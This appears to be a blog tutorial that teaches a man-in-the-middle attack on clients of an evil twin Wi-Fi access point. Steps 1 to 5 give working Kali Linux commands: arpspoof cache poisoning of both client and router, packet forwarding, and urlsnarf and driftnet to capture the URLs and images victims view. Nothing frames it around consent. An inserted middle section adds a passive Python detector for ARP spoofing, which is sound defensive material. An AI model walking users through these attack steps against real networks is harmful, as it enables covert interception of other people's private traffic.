Hello again to another Hacking Intro Tutorial.
Last week we created and powered up our own Evil Twin Access Point. Once you have people connecting to your Evil Twin you can intercept and analyze their traffic by conducting a Man-in-the-Middle Attack (MitM). For this tutorial, I will show you how to do a MitM Attack.
Before we jump right in let’s talk about what a MitM Attack is. To put it simply, a MitM Attack is where we put ourselves between the victim/client and the server s/he is connected to. We then would grab all traffic that passes by the connection between the two, otherwise known as sniffing.
So, let’s begin shall we?
Step 1: Promiscuous Mode
Like previous tutorials, we are going to want to make sure that our wireless adapter can be detected. In Kali Linux, open up a terminal and type in the following command:
root@kali: ~# iwconfig
The wireless adapter I am going to be putting in promiscuous mode is assigned as wlan1. I will do this by typing in the following:
root@kali: ~# airmon-ng start wlan1
You should be given a notification that the wireless adapter is now assigned to mon0.
Step 2: Client to Server
Our goal for conducting a MitM attack is to make the client believe that we are the server and for the server to believe we are the client. We will be using arpspoof to do this. In order to do this we will first want to open up two terminals.
Now, let’s say that the client and server have the following IP addresses:
Server: 192.168.0.1
Client: 192.168.0.27
We will want to replace the address of the server with our address. This way the client believes that we are the server. In one of the terminals, type in the following:
root@kali: ~# arpspoof -i wlan1 -t 192.168.0.27 -r 192.168.0.1
Where our interface (-i) will be the adapter we put in promiscuous mode. The target (-t) is the client’s IP Address and the router (-r) is our server’s IP Address.
Step 3: Server to Client
Next we want to replace the client’s IP address with our IP address so the server believes we are the client. To do this, we simply reverse the order of the client’s and server’s IP addresses. Go to the second open terminal and type in:
root@kali: ~# arpspoof -i wlan1 -t 192.168.0.1 -r 192.168.0.27
Now we will execute both commands.
You should get a similar message below for both terminals:
Step 4: Forwarding Packets
Now that we are impersonating both the client and the server, we will want to forward all data packets to the other machine. Meaning, we will be forwarding packets from the client to the “server” and forwarding packets from the server to the “client”.
We enable this in Kali Linux using ip_forward. The whole command we would type in would be:
root@kali: ~# echo 1 > /proc/sys/net/ipv4/ip_forward
Where 1 is the value being written by echo, and > redirects that output into the ip_forward file, switching forwarding ON.
If you successfully enabled ip_forward you should not have received anything back. To confirm that ip_forward is enabled we would want to type in:
root@kali: ~# cat /proc/sys/net/ipv4/ip_forward
If it is enabled we should get a value of 1.
Our system, which is in the middle, will now be receiving all traffic between the client and server.
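From the defender’s side, the two arpspoof commands above leave a very visible fingerprint: the gateway’s IP suddenly answers from a new MAC, and that same MAC then also claims the client’s IP. The following passive detector is an added example written for this tutorial, not code from the original post or from the dsniff suite; it runs over a constructed list of ARP replies (sender IP, sender MAC) standing in for what a LAN sensor would capture.

```python
"""Passive ARP-spoofing detector over a constructed stream of ARP replies."""
from collections import defaultdict

# Constructed sample of ARP replies as (sender_ip, sender_mac), in the order
# a sensor on the LAN might see them. The first three are legitimate hosts;
# the last two mirror the two arpspoof commands in Steps 2 and 3: one MAC
# answering for the router and for the client at the same time.
SAMPLE_REPLIES = [
    ("192.168.0.1",  "aa:bb:cc:00:00:01"),   # real router
    ("192.168.0.27", "aa:bb:cc:00:00:27"),   # real client
    ("192.168.0.10", "aa:bb:cc:00:00:10"),   # unrelated host
    ("192.168.0.1",  "de:ad:be:ef:00:99"),   # same IP, new MAC: gateway rebound
    ("192.168.0.27", "de:ad:be:ef:00:99"),   # same MAC now also claims the client
]


def detect_arp_spoofing(replies, protected_ips=("192.168.0.1",)):
    """Return a list of alert strings for the given ARP reply stream.

    Two signals are checked:
      1. an IP that was previously bound to one MAC is announced from a
         different MAC (the cache-poisoning signature);
      2. a single MAC announces itself as two or more IPs, one of which is
         a protected address such as the default gateway.
    """
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"ip {ip} moved from {previous} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        claimed = mac_to_ips[mac]
        if len(claimed) > 1 and any(p in claimed for p in protected_ips):
            alerts.append(f"mac {mac} claims {sorted(claimed)} including a gateway")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_REPLIES):
        print("ALERT:", line)
```

On a live network the same function can be fed from a packet sniffer such as scapy by passing `(pkt[ARP].psrc, pkt[ARP].hwsrc)` for each reply (`op == 2`); the static-ARP-entry and DHCP-snooping controls the alerts point to are the usual mitigations.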
Step 5: Reading Traffic
Now that we are receiving traffic between the client and server let’s read it. We will do this by typing in:
root@kali: ~# urlsnarf -i wlan1
I will now receive any URLs the client goes to. One of my favorite parts about urlsnarf is that you can simply click on the URL to be taken directly to it.
Another nifty thing we can use is driftnet. Type in the following command to see what pictures the client is viewing:
root@kali: ~# driftnet -i wlan1
There are many other sniffing tools you can play around with, such as dsniff and ettercap, that are also very fun and very useful. I would highly recommend checking them out if you want to explore sniffing further.
That’s it for this Hacking Intro Tutorial. In the next tutorial we will be cracking into WEP networks.